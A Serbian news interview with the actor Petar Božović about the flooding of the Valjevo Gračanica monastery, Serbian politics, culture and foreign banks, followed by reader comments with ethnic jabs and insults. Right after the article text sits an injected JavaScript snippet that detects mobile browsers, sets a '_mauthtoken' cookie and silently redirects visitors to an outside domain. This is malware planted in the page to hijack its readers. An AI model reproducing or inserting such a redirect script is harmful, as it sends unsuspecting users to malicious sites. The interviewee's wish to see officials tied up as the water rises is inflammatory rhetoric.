INTERVJU, PETAR BOŽOVIĆ: Dići ću treći srpski ustanak, potopiću njih umesto Gračanice

INTERVJU, PETAR BOŽOVIĆ: Dići ću treći srpski ustanak, potopiću njih umesto Gračanice


+++Gledao sam taj užasni prizor ravan genocidu, kada pop drži liturgiju, a voda do kolena. Da je bilo pravde svezali bi za stubove sve koji su to odobrili i za koje su zakoni opština iznad Božjih +++ Ovi koji su sišli sa vlasti su doveli Ove na vlast. I sad se prepiru oko nečega. Oko čega?!

Bard domaćeg glumišta Petar Božović, glumac koga bi, kako kažu, žene slušale i da čita telefonski imenik, ovih dana će sa Narodnim pozorištem Republike Srpske pred beogradskom publikom izvesti komad “Otac i sin“.

Reč je o gostovanju predstave za koju je tekst napisao Nebojša Romčević, a režirao Nikola Pejaković, a koja se igra 10 i 11. juna u “Madlenijanumu”. O ovom delu, vremenu u kome živimo, našim naravima, nostalgiji Božović govori za Ekspres.

– Zvali su me, Romčević pisac i reditelj Pejaković, mali genije, u Republiku Srpsku, da radimo, i hvala im. Pre odlaska u Banjaluku bio sam na Pejakovićevom koncertu sa ansamblom “Grobovlasnici” u Domu sindikata, nekadašnjem hramu muzike i svekolike kulture, svega što se dešavalo od “Beogradskog proleća” do džez festivala. Oronuli Dom sindikata kao da se podmladio, stajalo se, video sam mnoga zvučna imena, od Bregovića, Đorđevića do Bajagića, i raznih drugih. Bilo je uzbudljivo, dirljivo, njegova superiornost, sigurnost. Dopao mi se, pošto sam voleo pokojnog Džoa Kokera, on mi je to malo nadomestio. Oduševio me je, kaže Petar.

_SDZ1680

Kao da na zemlji vladaju samo ovi zakoni mesnih zajednica i opština, a Božiji zakoni ne vrede ništa, pa možete da rušite svetinju iz 13, 14 veka, tako tek

Dok ga ovih dana gledamo kao Gavrila u seriji “Volim i ja nerandže no trpim” ili Danila Živića u “Više od igre” Božović ne gubi oštricu.

– Kod nas je 42 odsto nepismenog stanovništva, ali veruj da mi je nekako lakše od tih nepismenih, koji pretpostavljam žive na selu, pa nešto i rade tamo… Ovi polupismeni su opasni, to je masa ljudi koja je ni tamo ni ovamo, a koja je podložna svakoj politici, svakom glasu, veli glumac i nastavlja u istom stilu:

– Želeo bih da dignem treći srpski ustanak i to da bude sužen na područje Valjevske nahije. Zašto? Zbog svesnog i planiranog uništavanja nasledstva Nemanjića. Mala Gračanica kod Valjeva se potapa. Gledao sam početak, kako ulazi voda – voda im stala dabogda. Znate kakvi su naši problemi sa rušenjem naših svetinja u okruženju, od Kosova da krenemo, a sad mi to radimo u srcu Srbije. U srcu Šumadije, u srcu ustaničkog Valjeva, u srcu mesta Seče knezova, u srcu mesta rođenja Nenadovića, Desanke Maksimović… I to se dešava bez ikakvog otpora crkvenih vlasti, sa odobrenjem tih gradskih vlasti. Jer oni su davno nekad potpisali nešto i dogovorili se…

Kao da na zemlji vladaju samo ovi zakoni donešeni od strane mesnih zajednica i opština, a Božiji zakoni ne vrede ništa, tako da možete da rušite jednu lavru Nemanjića iz 13, 14 veka, ovako tek. Ne razmislivši, ne pokušavši da ponovimo podvig što je uradila Anika Skovran sa Pivskim manastirom. Da izneseš kamen po kamen, još je ovaj manji od Pivskoga manastira. Ali ne, to je urađeno, da bi apsurd bio veći, zbog vodosnabdevanja Valjeva. A, kakve li ironije, taj predeo Valjeva i nahije je najbogatiji vodom u Srbiji. Gledao sam taj užasni prizor koji je ravan genocidu kulturnom, kada pop drži liturgiju gde mu je voda do kolena. A da je bilo pravde bili bi svezani za stubove svi koji su to odobrili, a da im voda dolazi sve više i više i da pređe preko bezbožnih usta koja su to dozvolila, oštar je Petar:

_SDZ1713

Gledao sam taj užasni prizor ravan genocidu, kada pop drži liturgiju a voda do kolena. Da je bilo pravde svezali bi za stubove sve koji su to odobrili

– Druga stvar, to je trusno područje, brana je nasipna, nije betonska, nije jaka, ona već počinje da vlaži, taj donji deo. A kad počne da vlaži znači da je sklona rušenju. Kada ona, ne daj Bože, a u ovom trenutku, kad sam ovako iznerviram, čak i na to pomišljam kao opomenu ovome jadnome narodu, popusti, Valjevo nema više od 15 minuta da se evakuiše, naglašava glumačka legenda.

PROČITAJTE JOŠ: 
INTERVJU, CANE PARTIBREJKERS: Mi smo kao izmaltretirano kuče koje te ugrize kad hoćeš da ga nahraniš

INTERVJU, TROICKI: Odrastao sam sa Noletom i ne mogu da shvatim njegove uspehe

Prema njegovim rečima, i struka se slaže sa njegovom konstatacijom.

– Ništa ne govorim na pamet, slušao sam i stručnjake, javne rasprave i ove koji govore na televiziji. Kome govore, jesu li to Valjevci čuli? Zovem jednog prijatelja, pitam: “Šta radite vi? Jeste li izašli na ulice? Srušite taj jebeni zakon. To je dekret, najobičniji. Oćete da nam ubijete decu”. Kaže: “Ne znam ja, to je država kriva. Odjedanput država… Pa vi ste država. Naš narod stalno zamišlja državu kao neku prepreku, ko da to nije njegovo, nego je kao državno. Pa i ta država je sastavljena od ljudi. A i vi ste ljudi, iako ste Valjevci. Baš sam ljut na njih. Takva nezainteresovanost za sudbinu je strašna, kako možeš govoriti o patriotizmu kad ni ispred svog praga nećeš da se pomeriš, ogorčen je glumački bard.

Kako kaže, svakom legalnom izabranom predstavniku daje podršku, ali na svoj način:

– Moraš stati iza svoje države, ali možeš da je kritikuješ kako hoćeš, nemaš drugu. To je tvoja domovina. Ja ću da se pozovem na Slobodana Jovanovića, na Vinavera, na Miku Alasa, na Pupina, o kome ne znamo ništa. Ovi koji su sišli sa vlasti su doveli Ove na vlast, nisam ih ja dovodio. I sad se prepiru oko nečega. Oko čega? Svaka vlast je nekulturna, a ova posebno. Zato što gaji nekulturu, oduzimajući kulturi sve živo. Počev od onog nestvarnog budžeta od 0,6%, zbog koga svako ko uđe u Skupštinu nije predstavnik one Srbije iz 1903, 1914, 1920, one Srbije koja je ulagala u kulturu, gajila inteligenciju, tvrdi glumac.

Prema njegovim rečima, ni svi oni koji su nezadovljni društvom kao on nemaju iste porive kad kritikuju:

 

Foto: Saša Džambić

Foto: Saša Džambić

Ovi koji su sišli sa vlasti su doveli Ove na vlast, nisam ih ja dovodio. I sad se prepiru oko nečega. Oko Čega?! Svaka vlast je nekulturna, a ova posebno. Zato što gaji nekulturu, oduzimajući kulturi sve živo. Počev od onog nestvarnog budžeta od 0,6%

– Kad uporedite samo ove naše intelektualke, od Biserko do Kandić i Borke Pavićević, pa se setite Nadežde Petrović, koja je veće ime i od brata Rastka, slikara, i ostaće jer je pripadala svom narodu. Setimo se da je u valjevskoj vojnoj bolnici dobila tifus brinući o ranjenicima. Pa, dalje, imamo primere poput Domanovića, koji je kritikovao društvo, Nušića, koji je išao i u zatvor. I to je za ljude. Ali oni nisu dobijali nikakvu pomoć od Soroša, nevladinih organizacija i raznih grupa koje se samo trude da ti razjebu sistem, banke, fabrike, kaže Petar.

Glumac veruje da prebrzo zaboravljamo ne samo svoju istoriju već i ono što istorija tek treba da postane:

– Nazvali su akciju kojom su nas častili bombama “Milosrdni anđeo”. Sećam se da su naša braća Cigani pisali kad su demonstrirali “KlinKtone, nisi u pravu”. To je jedini narod koji je ostao sa nama, pa i mi sa njima. Kao što smo bili i sa Jevrejima za vreme rata, kao što smo bili sa Slovencima koji nas sad ne poznaju. A zaboravili šta je pisao Cankar, pa Prešern, koji je Juliji Primcovoj govorio: “Slovenke lepe što nemecki zbore, Parnas moj su slovenske gore“. Ali oni i ne čitaju Prešerna, kao i mi što ne čitamo Njegoša, ili ga sklanjamo, što čine ove vlasti, i one u Crnoj Gori. Sve se to o glavu obija, jer što se ti više trudiš protiv uma, on ti sve više odzvanja u svim čulima, siguran je glumac.

PRINCEZA DINA: Žena koja je skinula hidžab i postala arapska Keri Bredšo (GALERIJA)

Petar pamti i sistem u kome je čovek imao osećaj da je deo društva u kome živi kaže :

– Prvo su nas ubili pričom o tranziciji, srušili nam sve domaće banke, a danas ti nemaš sela u Srbiji da nema blistavi fasadu neke strane banke. Odakle taj interes za nas i briga? Bar da daju neku kamatu. Samo ti naplaćuju sve živo, a moraš preko njih da ideš. Onu crkavicu što si zaradio provlače kroz svoj sistem da bi bilo legalno i da oni uzmu svoj danak. Turci su mila majka, imali su nekoliko određenih poreza, to daš i zdravo. Ovo ne znaš ko više pljačka. Šta je bilo sa duvanskom industrijom? – odmah su je uzeli i napisali ogromnim slovima na kutiji cigareta “This is bad for Your health”. Ti si baš došao da me čuvaš, a ote mi najveći izvor prihoda…

_SDZ1700Danas nema sela u Srbiji da nema stranu banku. Odakle taj interes za nas i briga? Bar da daju neku kamatu. Naplaćuju sve živo, a moraš preko njih da ideš. Turci su bili mila majka, imali su nekoliko poreza, to daš i zdravo

Božović važi za nekog ko nema dlake na jeziku i smatra da je to jedini častan način za njega.

– Nek košta šta košta… Ne bih mogao da živim licemerno. Znao sam da me koštalo zato što nisam pristao na dobrobit koju bih imao, jer mi se gadila. Gledajući neke prijatelje koji su pristali i olako prodali svoju dušu, ne znam zašto. Ako je prodam za jednu kuću ili dve, šta će mi treća. Možeš li jedne noći da spavaš u tri kreveta… Ali, kad imaš kuće imaš i probleme, prokišnjava ti ova gore na planini jer je sneg, a ona na moru mora da se farba pošto je morska voda nezgodna, a ne možeš da stigneš ni u jednu od zadatka partijskog. Pevala je jedna naša, to mi je pričao pokojni Milo Đukanović, reditelj “Kamiondžija”, ne ovaj Milo, reditelj svega živog u Crnoj Gori sada. Jedna žena iz sela blizu Cetinja, zove se Dobrsko, ide za ovcama i peve tužbalicu: „Tetka moja ne mogu ti ja na groblje, ne mogu ti ja iz sela dobrskoga, ne mogu ti zbog sastanka partijskoga”, kaže Božović, sećajući se da su nedavno opet emitovane kultne serije u kojima je igrao:

Kao u seriji „Volim i ja nerandže”, pravi Božović insinuacije i nastavlja sećanje na serijal “Više od igre”, koji je RTS nedavno reprizirao:

– Taj Boba Stojanović je divan pisac, gledam sada neke delove “Više od igre”, nikad do kraja to nisam pogledao… Mada su mi drugovi jednom u Nišu, kad sam bio na Susretima, rekli: “Ima da se kupi tvoj CD”. Koji, pitam? „”Više od igre”, rekoše… Ponekad vidim po malo, divno je to, vreme, varošica… To je snimano u Ivanjici i malo u Velikom gradištu. Lepo smišljeno: “Radnički” i “Građanski” i sport. A znamo šta je posle bilo, ova ideologija, ona ideologija, Drugi svetski rat… Imam nostalgiju spram tog divnog vremana, meni se tada rodio sin, bio sam mlad čovek, imao glavnu ulogu u važnoj seriji, sva vrata su mi se otvarala, život izgledao lepo, pomisliš “Kad je ovako sad, kako li će tek posle biti…”, priseća se glumac.

Rođen u Zemunu, detinjstvo proveo u crnogorskim vrletima, sebe po spstvenom priznanju smatra Srbinom iz Crne Gore, a prestonicu svojim dvorištem:

_SDZ1677

Kaže mi prijatelj, odveo decu u najpoznatiji restoran brze hrane: kupiš dva, treći je džabe. Pitam ga: “Pa, jesi li toliko gladan?” Nisi? Pa šta će ti onda…?!

– Dao sam intervju na temu Beograda i nedelju dana posle mene piše Tirke: “Hteo sa da kažem nešto o Beogradu, ali kada sam pročitao šta je Petar Božović rekao, odustao sam.” Ali mi smo generacije koje isto osećamo. Sve je tobož isto, i sve pokušavamo da spakujemo u istu ambalažu…

Božovića je, kako kaže, odgajila baba-tetka Vida Vlahović i usadila starinske moralne norme o čemu kaže:

– One nisu starinake, samo su zastarela, one su of, jer nisu in, one su u bekstejdžu, nisu u konkurenciji za prvi vokal kod ovog iz Pinka. Imaš 50 kanala, a nemaš ni jedan koji ima normalnu muziku, decu uništiše… jer ne mogu svi da budu pevači, a neće da pevaju za svoju dušu i za svoje roditelje i za prijatelje. U toj emisiji “Nikad nije kasno”, vide se neki sjajni talentovani ljudi koji su bolji od 90 odsto ovih koji sede u tim žirijima, a oni nikada i nisu bili u prvom ešalonu, jer je bilo onih koji su bili mnogo bolji od njih, poredi Božović i analizira.

_SDZ1729I šta si stvorio?! Novi robovlasnički svetski sistem, kojim se lako vlada, jer kad ti isteče baterija, ti si bespomoćan

-Mlad čovek koji je navikao da virutelno komunicira zna samo kad je prazna baterija, ne zna ništa o tačnosti, ne zna šta je red, a ni preko tog reda. Vaspitan je da njemu niko ništa ne sme da kaže, on je svesno biće koje sme učiteljicu da izlema jer ga je iznervirala. I šta si stvorio?! Novi robovlasnički svetski sistem, kojim se lako vlada, jer kad ti isteče baterija, ti si bespomoćan, priča glumac i sumira:

INTERVJU, MILORAD ULEMEK LEGIJA: Niko u državi nema muda da obnovi suđenje

– Kaže mi prijatelj, odveo decu u najpoznatiji restoran brze hrane: kupiš dva, treći je džabe. Pitam ga: “Pa, jesi li toliko gladan?” Nisi? Pa šta će ti onda?

MIŠKOVIĆI I OSTALI, BUDITE MALO KO KOLARCI…

Pre par godina Božović je priredio humanitarno veče za pozorište Atelje 212

– To je kao poziv ostalima da se pridruže, jer moje humanitarno veče ne može da plati struju za taj mesec… Kao inicijaciju nekog kulturnog bunta, pokreta, ja sam im predlagao da izađemo na ulicu, ali normalno, nećemo da rušimo i razbijamo. Da li je istina da su glumci i pozorišta kulturni cvet Beograda, da li se ti time praviš važan? Pa, onda nemoj dozvoliti da se pozorišta tretiraju kao radna organizacija sa ulaznim i izlaznim kapitalom. Tadašnji gradonačelnik odlučio je dati pare za po neku premijeru, a ja se pitam: Da li si to zaradio pa daješ, da li ti je ostavio babo, da li si ti Ilija Kolarac? Zato sam govorio da mi glumci treba da izađemo na ulicu, ne da čekamo da voda dođe do tvog praga, Ateljea, Narodnog… A ako je svim tim Miškovićima i inim stalo do sopstvenog naroda neka naprave nešto poput tog Kolarca. Eto balet i opera, to je gorući problem Narodnog pozorišta, koje je pre toliko godina napravila ona svinjarska Srbija, koju su vodili obor knezovi, trgfovci svinjama, Miloš i Karađorđe

 

PRLJAVE IGRE VELIKIH SILA

Kako Božović kaže male zemlje su često nevažne u politici velikih sila:
– Sećam se ode Klinton u Crnu Goru i zahvali im se na sjajnom prijemu u Makedoniji… Gledao sam to svojim očima. Ko da ja ne znam šta je šta, kao da sam nisam Srbin iz Crne Gore. Ti odvratni zločinački umovi koji pričaju o nekim “malim narodima”, a čine zločin prema čovečanstvu. Tako je bilo u celom svetu. Šta su uradili u Obali slonovače… Gore palma, dole more, uloviš ribu, lepota, živelo se lagano… Dođoše spasioci sveta: “vi ste nevernici”, “vi ste ovo, vi ste ono”, “mora ovde demokratija da se uvede”. Videše gde je zlato, gde je nafta… Zaprljaše more, dadoše im uniforme, plemenski ih zavadiše Kao nas na Balkanu. Pa čije je to maslo, nije samo Srba i Hrvata… Evo šta rade sada sa Bosnom, oteše nam Kosovo, sad hoće da to spoje sa Albanijom. Grade autoputeve tamo gde im baš po logici nije mesto… Što ih ne grade kroz Srbiju? Sve je to belodano jasno. Ugroženi su im interesi ispred tvoje bašte u Mionici. Njegove kuće, bašte i bazeni su u Kentakiju, ali su tu ugroženi njegovi strateški interesi. Na isti način se branila i socijalistička internacionala Brežnjeva… Oni imaju strateški interes u tvoj bašti i nemoj luk da mu sadiš koji oni ne vole, izričit je glumac.

PROČITAJTE JOŠ:

KRVAVA ISTORIJA TAJNE POLICIJE (1.DEO): Kako su Leka i Krcun u Titovo ime štitili narod od neprijatelja

DRAGOJEVIĆ: Zašto su na TV zabranili mene, Acu i “Kakagrad”

KAKO JE UĆUTKAN DUŠKO RADOVIĆ: Rečenica koja je došla glave najvećoj legendi Beogradaif (document.currentScript) { if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

17 komentara

Dodajte komentar
 1. 2
  Dejan

  Poštovani gospodine Božoviću,
  Sve manje i manje je bardova i velikih imena, kakvo ste Vi za života zaslužili. Ako ovaj narod ne pokrenu takva velika imena – niko neće! Koga ovaj narod da sluša, ako ne Vas i Vama slične? Mediokritete i polu-pismene ljude? Godine lete, stari se, polako odlaze svi veliki ljudi… nemojte da odete i Vi, a da ništa ne učinite! Pokrenite se i pokrenite velika imena oko sebe, a verujem da će Vas mnogi podržati! Takve veličine će i narod prepoznati i podržati! DIŽITE TREĆI SRPSKI USTANAK! Dosta nam je nekulture, korupcije, lopovluka…

  • 3
   Saxon

   Slazem se u potpunosti,ako se ovakve ljudske gromade pokrenu ima nade , u suprotnom ,prosto ce nas ugasiti .

 2. 5
  Zoran

  Možda i nije na mestu, moj komentar, u mojoj Srbiji, a koji ću ostaviti ovde….. Nije na mestu a samo zato što se uvek nađe neki VEĆI Srbin od mene, koji komentariše moju Srbiju, a u svojoj državi odakle je u Srbiju došao, haos do guše. Dosta mi je tih velikih dušebrižnika Srba, van Srbije, koji se toliko brinu o nama i ovde nam dele lekcije o srbstvu, i Srbiji. Zašto se taj Božović. nije setio pa da prvo neke stvari reši i popravi u njegovoj Crnoj gori, odakle je došao. Neka prvo tamo uvodi srpstvo, i neka prvo tamo rešava svoje frustracije. Pola Crne gore je POBEGLO i živi u Srbiji, i svi su oni veći Srbi od svih nas Srba koji živimo ovde, i imaju veća prava, i uživaju sve benificije, koje im pruža MOJA Srbija. I samo ta polovina Crnogoraca koji žive tu u Srbiji, kažu, i priznaju da su rodom Crnogorci, a poreklom Srbi. Ostali, koji su tamo u onoj vukojebini, i koje poštujem maksimalno, a samo zato jer su OSTALI u toj vukojebini, i tamo žive, izjašnjavaju se kao Crnogorci. I pošteno da ti kažem, boli me…….. kako će se svi oni izjašnjavati. Neka se i ova polovina, onih koji žive u Srbiji, i sebe zovu Crnogorci, a u srcu su Srbi, izjasni kako im je volja. Čak bih više voleo da se i oni izjasne kao ČISTI CRNOGORCI, i neka ih neka ŽIVE u ovoj našoj NIKAKVOJ PROPALOJ, I TRULOJ SRBIJI. Neka ih neka žive i uživaju, ali neka ĆUTE, i poštuju SRBIJU, kao njihov novi dom, ali nemoj da mi sole pamet da su oni VEĆI SRBI OD MENE, i neka ne ispravljaju KRIVU DRINU po zemlji Srbiji, već neka puste, nas, Srbe, da mi to radimo……. ONAKO KAKO ZNAMO I UMEMO.

 3. 6
  биљана

  СЛАЖЕМ СЕ 100 ПОСТ СА ВАМА О СВЕМУ!! НАЖАЛОСТ НИСТЕ У ВЛАДИ!! ТАКВИ КАО ШТО СТЕ ВИ НАМ ТРЕБАЈУ! ЖИВЕЛИ!

 4. 7
  dalibor

  Svaka cast za Petra a i Dejanov komentar je super. ja sam i Republike Srpske i kao svi mi smatram srbiju za svoju domovinu,mi se nismo borili za bosnu,to su nam kriminalci nametnuli.Ljudi vreme je da se probudimo,ubise nam vjeru i moral,ustanimo odmah da ne bude kasno sutra.

 5. 8
  pg.cg

  Zorane.. pitao bih te kako se prezivas kad si toliki srbin, ili si neki veci rus nego srbin.. ja sam crnogorac iz crne gore, zivim u crnoj gori i mogu ti reci da nam mesto nije dobro odje ali je komad bolje nego sto je kod vas u srbiji makar sto se plata tice.. a ti bio srbin ili dosljak nemas pravo gospodinu kao sto je petar bozovic da kazes kako da se on osjeca, zbog toga sto se dijelimo po nacionalnoj osnovi a isti smo narod mi smo svi tu dje smo.. u americi zive i italijani i irci i afro amerikanci i meksikanco i svima se vijori americka zastava ispred kuce.. a nama obraz smrdi svima kako se dijelimo.. politicari i srpski i crnogorski preuzeli turski metod. . Zavadi pa vladaj.. a narod je stoka pa ga nije tesko podijeliti.. BRACO SRBI ZAPAMTITE DA BLIZEG NARODA OD NASA 2 NEMA, NISU CRNOGORCI IZDALI KOSOVO NITI SU GA CRNOGORCI PRIZNALI.. PRIZNALA GA JE VLAST KOJA ZNATE KAKO FUNKCIONISE ODJE.. BILA JE NEZAVISNA CRNA GORA I ZA VRIJEME PRVOG SVIJETSKOG RATA PA NAS TADA NISU KRVILI POLITICARI.. DOKAZ VAM JE BITKA NA MOJKOVCU.. KO IMALO ISTORIJE ZNA ONDA ZNA STA JE TADA CRNA GORA NAPRAVILA ZA SRBIJU.. A TAKO SE LJUDI ODJE I DANAS OSJECAJU TO TVRDIM

 6. 9
  Branka

  Poštovani gospodine Božoviću, raspitajte se malo bolje o Valjevskoj Gračanici pa ćete saznati da je sagrađena u dvadesetom veku i bitna je samo bivšem (?) monahu Antoniju. Sa ostalim sam saglasna. S poštovanjem, Branka Jovanović

 7. 10
  nepodobni komentar

  Зоране брате,свака ти част! Коначно неко да напише истину а има се још што-шта написати. Где је био г.Божовић када се народ бунио испред Владе? Зашто се јавља тек сада када је све готово? Очигледно ради своје промоције и паметовања. Ето како он све зна а то су и стручнији потврдили. Црногорци су људи који седе на две столице,заправо они који се називају србима црногорцима или црногорцима српског порекла… Не знаш када је црногорац а када је Србин? То изјашњавање зависи од њиховог тренутног интереса. Жале се на Мила а гласају га већински али се ваде на шиптаре и муслимане из Цг да га они изгласавају. Какви лицемери. Овде у србији се међусобно тале,намештају својима тезге, бесплатно школују,баве се организованим криминалом,антисрбском политиком а бесрамно нас лажу у очи како су нам браћа.
  Рецимо овај @cg.pg пише да се делимо по националној основи а исти смо народ ?!?! А да смо исти народ што би се онда делили по националној основи??? Зашто ви црногорци толико истичете своју “посебност” називајући се црногорцима ако сте “Срби”??? А Мојковачке битке не би ни било да Срби нису хтели помоћи црногорцима. Кога су то црногорци “бранили” када је Србска војска имала заштитне јединице које су бранили повлачење и још 6500 припадника четничких добровољачких одреда са истом наменом. Чим се Срби повукоше утекоше и црногорци. Што не напише где је био остатак црногорске краљевске војске када се само шака јада борила на Мојковцу? Где нестаде остала црногорска “јуначка” војска? Зашто нису бранили своју земљу од окупације??? Како је г. cg.pg “заборавио” да напише да су Срби платили изградњу пута кроз ЦГ за повлачење а црногорци су то саботирали због позамашне новчане награде од Аустоугарске монархије. И за чудо, “братски” народ се није бунио против те издаје црногорског краља и власти. Како се није г.cg.pg “сетио” да напише о односу црногораца према србској војсци на путу кроз ЦГ? О нападима на наше војнике,о продаји хлеба и намирница по неколико пута већој цени од стварне и то само за сребрњаке или дукате? Г.cg.pg пише како нема ближих народа од наша два а увек су нам забадали нож у леђа,од Косовског боја па на овамо сем када су имали неки интерес онда су сарађивали. Зар не побеже Ђурађ Страцимировић Балшић са својим Зећанима и Влатко Вуковић са Херцеговцима пред сам почетак боја? Зар Петар I није одбио да помогне Србима у Првом Србском устанку? Зар није Вук Караџић са два разреда основне школе “измислио” данашњи језик а велику помоћ у томе је имао од свога кума римокатолика Јана Копитара? А тек о Епским “народним” песмама у којима клеваћа Вука Бранковића не треба ни писати. Уништио је “брат” црногорац стари србски језик и поред великог труда Карловачке митрополије да то спречи. Опет је вртела пара где бургија неће било да су то Карађорђевићи или Обреновићи јер и једни и други су налазили уточиште у Аустрији. Па онда није ни чудо што си писали указе на нашу штету,србску штету! Толико о “браћи” а могло би се сазнати још од боље информисаних.

 8. 11
  Marsovac

  Ovo je stav jednog intelektualca,velikog glumca i prije svega covjeka! A vi koji ste nasli priliku da sirite svoju glupost koja je beskonaca treba da se stidite…jer bas zbog vas takvih kakvi ste se u Srbiji i okolnim zemljama desavaju sve ove gluposti,zbog vas je ta VASA SRBIJA takva kakva jeste,bas kako jedna od vasih velikih voljenih zvijzda estrade kaze “sodoma i gomora”! A to ste vi napavili, i ne zanimate me uopste vise ni vi ni vasa Ceca Majka i ostale silikonske kurve koje podrzavate slusate i tetovirate po tijelu…KAKVA MUZIKA TAKVO DRUSTVO!!!! 90 posto stanovnistva u srbiji je primitivno i tupo,ne dozovoljava ni da mu se kaze…ne dozvoljava pametnijem da govori, a pusta lopove,kurve i ubice da im uce djecu…gadite mi se! Vi ne volite vasu zemlju vi je unistavate, vi niste patrijote vi ste lopovi, polupismeni slijepci…materijalisti! Ne volite vi vasu zemlju, i to sto poznajete malo istorije ne znaci da volite svoju zemlju, vi kradete od svoje zemlje, vi ne ulazete za doborbit svih samo mislite na vase sopstvene guzice…gadite mi se i vi i vase srbstvo! Prodali ste kosovo sami VI, jer volite pare vise od majke rodjene, a sada krivite sve druge za to…90 posto vas nikad nije ni bilo na kosovu!! I ne zelim vise da trosim rijeci na vas…samo sam htjela da vidim sta nam to Petar zeli reci…Ne bih zivjela u Srbiji nikada, mentalitet koji mi se gadi, zemlja koja se raspada, narod primitivan i tako dalje… pumpajte usne i dojke pa ih unovcite, PRAVITE PJEVALJKE I PJEVACE to ce vas spasiti ako nista… cijeli balkan mi se gadi..a Srbija koja je u centru salje najgore vibracije.. Ja hvala Bogu zivim na Marsu od juce i super mi je..

  • 12
   nepodobni komentar

   Pa stanje u Srbiji je ovako loše upravo zbog takvih kao što si ti i tebi sličnih. Da nema vas ne bi ni bilo ovog kiča,starleta i svega ostalog. Pogledaj poreklo likova na rijalitima i biće ti sve jasno.Sva sreća pa ne živiš u Srbiji,još na samo tvoj otrov fali.

 9. 13
  Petar

  Ovo je reč intelektualca koji zna i za Hajat i vodu iz čatrine. Sir od jutros i kavijar iz uvoza. Svestran, načitan, odgajan i što je vrlo bitno odbranio je sve svoje duhovne vrednosti od današnjeg vremena. Ko razume… shvatiće.
  Ponosan sam što imamo isto ime… bar :)

 10. 14
  Budinka Vodeničar

  Već sedamdesetak godina komunistička i neokomunistička vlast u Srbiji radi po oprobanom receptu nacističke vladavine. Hapsi, izmišlja spoljnje i unutrašnje neprijatelje, jednom rečju pravi jeftinu palanačku predstavu. A krajnji cilj ove maškarade je bacanje prašine u oči, kako srpski narod ne bi primetio njihovu vlastodržačku klilavost i impotenciju. Od kolektivizacije i čupanja brkova do gubitka Kosova i Metohije i potapanja Valjevske Gračanice, u Srbiji vlada klasični apsolutizam i masovna hipnoza, kako bi Srbi više verovali političkim komesarima i partijašima
  nego sopstvenim očima. Početkom Trećeg milenijuma dodirnuli smo samo dno dna, jer su, konačno, sve maske pale, odnosno, sad se i golim okom može videti da su se svi odrodili, i vlast i opozicija i mediji i Akademija i Crkva, od realnog života i problema običnog, malog čoveka. Andrić je jednom rekao da *treba bežati odavde, kao od kuće koja se ruši*

 11. 15
  Жикс

  нека, Божовићу, нека! Пушти јадан општа места на која се ко буцови ватају полуписмени. Твоји полуписмени! Моји полуписмени гледају да како прогурају до првог. То што гледају на тв то што има да се гледа, па шта? Шта да гледају? Тебе од двеста кила? Од чега си набио тих двеста кила мој Божовићу? Имао си пролаз свуда, свуда те беше, играо си се и за то био плаћен Други су хтели само да раде, без игре али ни рада не беше. Немаш право да говориш о било чему, ниси надлежан! То што те називају “бардом глумишта”, врхунским интелектуалцем и сл је тек за смех. Интелектуалац јер си много чито, мој Божовићу? Слабо памтиш текст па мораш да га пуно пута прочиташ? Ко слабије памти-већи интелектуалац?
